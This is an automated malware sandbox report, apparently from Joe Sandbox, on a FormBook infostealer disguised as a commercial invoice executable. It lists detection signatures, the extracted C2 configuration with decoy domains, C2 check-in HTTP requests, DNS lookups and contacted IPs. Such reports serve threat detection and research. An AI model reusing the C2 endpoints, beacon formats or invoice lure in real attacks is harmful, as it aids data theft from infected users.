0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe", CommandLine: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe", CommandLine|base64offset|contains: N !, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe", ParentImage: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, ParentProcessId: 2412, ParentProcessName: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, ProcessCommandLine: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe", ProcessId: 236, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe", CommandLine: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe", CommandLine|base64offset|contains: N !, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe", ParentImage: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, ParentProcessId: 2412, ParentProcessName: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, ProcessCommandLine: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe", ProcessId: 236, ProcessName: svchost.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.22 - Destination IP: 162.241.203.16

Timestamp:	2024-07-25T21:37:35.428981+0200
SID:	2031453
Source Port:	49165
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.22 - Destination IP: 91.195.240.19

Timestamp:	2024-07-25T21:38:15.656881+0200
SID:	2031453
Source Port:	49166
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.22 - Destination IP: 65.21.196.90

Timestamp:	2024-07-25T21:35:13.954846+0200
SID:	2031453
Source Port:	49163
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.22 - Destination IP: 192.185.209.182

Timestamp:	2024-07-25T21:36:12.789655+0200
SID:	2031453
Source Port:	49162
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.22 - Destination IP: 185.107.56.60

Timestamp:	2024-07-25T21:35:53.734316+0200
SID:	2031453
Source Port:	49161
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.22 - Destination IP: 213.186.33.5

Timestamp:	2024-07-25T21:39:17.815301+0200
SID:	2031453
Source Port:	49168
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.crucka.xyz/jd21/"], "decoy": ["thepowerofzeus.com", "tampamlr.com", "00050591.xyz", "dominomusicmktlnc.com", "ai-defi.wiki", "tyumk.xyz", "gbqspj.club", "fostertv.net", "batremake.com", "nelwhiteconsulting.com", "amsya.com", "urbanholidayz.com", "463058.photos", "anag-gioielli.com", "kjsdhklssk73.xyz", "islarenta.com", "designed4lifecoaching.com", "autohotelsecrets.com", "susansellsmarin.com", "studyflow.xyz", "xdigistore.cloud", "zaib.art", "cabaiofficial.com", "lpocaxdb.xyz", "suziebujokmarketing.com", "skin-party.com", "maioral-store.com", "stellar-paws.com", "bfutureme.com", "slsmbcxw.xyz", "tech-with-thulitha.site", "kapten69pola.xyz", "carbon.services", "nourishingwithgreens.com", "ye78.top", "15ecm.com", "jeweljuice.store", "fasci.online", "ilovetvs.com", "85742668.com", "arthemis-168bet.site", "shangrilanovel.com", "somitk.online", "uhug.xyz", "dzaipu.com", "freyja.info", "senior-living-64379.bond", "p-afactorysale.shop", "vxjmjnwu.xyz", "fireborn-weldandfab.com", "californiacurrentelectric.com", "mantapnagita777.com", "tltech.xyz", "mrc-lithics.com", "marzottospa.com", "alivioquantico.com", "mercarfi.top", "bougeefilth.com", "suttonjstudio.com", "b2vvuc00.sbs", "pepenem.lol", "71421626.com", "viralvoter.com", "lvinghealthy.com"]}

Yara detected FormBook

Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Joe Sandbox ML: detected

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: C:\Windows\explorer.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.348238153.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.347630446.0000000002A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.356992362.0000000000720000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348109061.0000000000430000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348482025.0000000000590000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.356992362.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.868679723.0000000002080000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.357247442.0000000001EF0000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.356948769.0000000000560000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868679723.0000000002200000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: cscript.pdbN source: svchost.exe, 00000002.00000002.356958657.00000000004B0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.356910306.0000000000214000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868555182.0000000000350000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.869745021.000000000880F000.00000004.80000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.868627962.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868865940.00000000028AF000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: cscript.pdb source: svchost.exe, 00000002.00000002.356958657.00000000004B0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.356910306.0000000000214000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.868555182.0000000000350000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_012ADBBE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0127C2A2 FindFirstFileExW,	0_2_0127C2A2
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_012B698F
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B68EE FindFirstFileW,FindClose,	0_2_012B68EE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_012AD076
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_012AD3A9
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_012B979D
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_012B9642
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_012B9B2B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_012B5C97
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0035F0D3 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,	4_2_0035F0D3

Source: C:\Windows\SysWOW64\cscript.exe

Code function: 4x nop then sub dword ptr [esp+04h], 0Ch

4_2_00355AD1

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 192.185.209.182 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 65.21.196.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.00050591.xyz
Source: C:\Windows\explorer.exe	Network Connect: 84.32.84.32 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.thepowerofzeus.com
Source: C:\Windows\explorer.exe	Domain query: www.arthemis-168bet.site
Source: C:\Windows\explorer.exe	Domain query: www.kjsdhklssk73.xyz
Source: C:\Windows\explorer.exe	Domain query: www.alivioquantico.com
Source: C:\Windows\explorer.exe	Network Connect: 185.107.56.60 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.241.203.16 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ilovetvs.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.crucka.xyz/jd21/

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe	DNS query: www.00050591.xyz
Source: C:\Windows\explorer.exe	DNS query: www.kjsdhklssk73.xyz
Source:	DNS query: www.uhug.xyz
Source:	DNS query: www.crucka.xyz

Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=28cPGcaENb280W65HmbHU6pQLIPuemsbyE+toeghGUICUOM9gHK+zZW7s47qkPel79A7Dw==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.thepowerofzeus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=LcHXUWoW2sdPa4UFpuGqq/go6wrzpC/UeDgbPZxccUPKb44TjfXPeWdmbH3xVj13RIFx0w==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.alivioquantico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=+5nsDbzeImt5UbX4GDv04YNxDKhKydlr4q6vzHl7qi3uGOgXSU0vDET8vanb4niZtoheVA==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.00050591.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=4y1ij/qZRR1bNd/L/F5yLi+I0SkPKWffZZi+nDy9y9Wv5I2iqoZUG1btNWEB8myok8jbUg==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.arthemis-168bet.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=Bo1mqRoziIz4wcXV2Hze6fEKc1jUulyNDnBrZ1tCE4J7kcYVEj/nayXnveqqwa6JZwq74w==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.ilovetvs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 185.107.56.60 185.107.56.60
Source: Joe Sandbox View	IP Address: 84.32.84.32 84.32.84.32

Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: CP-ASDE CP-ASDE
Source: Joe Sandbox View	ASN Name: NFORCENL NFORCENL
Source: Joe Sandbox View	ASN Name: OIS1US OIS1US
Source: Joe Sandbox View	ASN Name: NTT-LT-ASLT NTT-LT-ASLT

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012BCF1A InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent,

0_2_012BCF1A

Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=28cPGcaENb280W65HmbHU6pQLIPuemsbyE+toeghGUICUOM9gHK+zZW7s47qkPel79A7Dw==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.thepowerofzeus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=LcHXUWoW2sdPa4UFpuGqq/go6wrzpC/UeDgbPZxccUPKb44TjfXPeWdmbH3xVj13RIFx0w==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.alivioquantico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=+5nsDbzeImt5UbX4GDv04YNxDKhKydlr4q6vzHl7qi3uGOgXSU0vDET8vanb4niZtoheVA==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.00050591.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=4y1ij/qZRR1bNd/L/F5yLi+I0SkPKWffZZi+nDy9y9Wv5I2iqoZUG1btNWEB8myok8jbUg==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.arthemis-168bet.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=Bo1mqRoziIz4wcXV2Hze6fEKc1jUulyNDnBrZ1tCE4J7kcYVEj/nayXnveqqwa6JZwq74w==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.ilovetvs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.thepowerofzeus.com
Source: global traffic	DNS traffic detected: DNS query: www.alivioquantico.com
Source: global traffic	DNS traffic detected: DNS query: www.00050591.xyz
Source: global traffic	DNS traffic detected: DNS query: www.kjsdhklssk73.xyz
Source: global traffic	DNS traffic detected: DNS query: www.arthemis-168bet.site
Source: global traffic	DNS traffic detected: DNS query: www.ilovetvs.com
Source: global traffic	DNS traffic detected: DNS query: www.bougeefilth.com
Source: global traffic	DNS traffic detected: DNS query: www.uhug.xyz
Source: global traffic	DNS traffic detected: DNS query: www.crucka.xyz
Source: global traffic	DNS traffic detected: DNS query: www.freyja.info
Source: global traffic	DNS traffic detected: DNS query: www.batremake.com
Source: global traffic	DNS traffic detected: DNS query: www.gbqspj.club
Source: global traffic	DNS traffic detected: DNS query: www.mantapnagita777.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 25 Jul 2024 19:36:32 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;

Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000003.00000002.869745021.0000000008CFF000.00000004.80000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.868865940.0000000002D9F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://thebatcompany.fr/jd21?tBZLfTtx=GfbF6txqq2gI5hQXVs74X
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.00050591.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.00050591.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.00050591.xyz/jd21/www.kjsdhklssk73.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.00050591.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alivioquantico.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alivioquantico.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alivioquantico.com/jd21/www.00050591.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alivioquantico.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.amsya.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.amsya.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.amsya.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arthemis-168bet.site
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arthemis-168bet.site/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arthemis-168bet.site/jd21/www.ilovetvs.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arthemis-168bet.siteReferer:
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batremake.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batremake.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batremake.com/jd21/www.gbqspj.club
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batremake.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bougeefilth.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bougeefilth.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bougeefilth.com/jd21/www.uhug.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bougeefilth.comReferer:
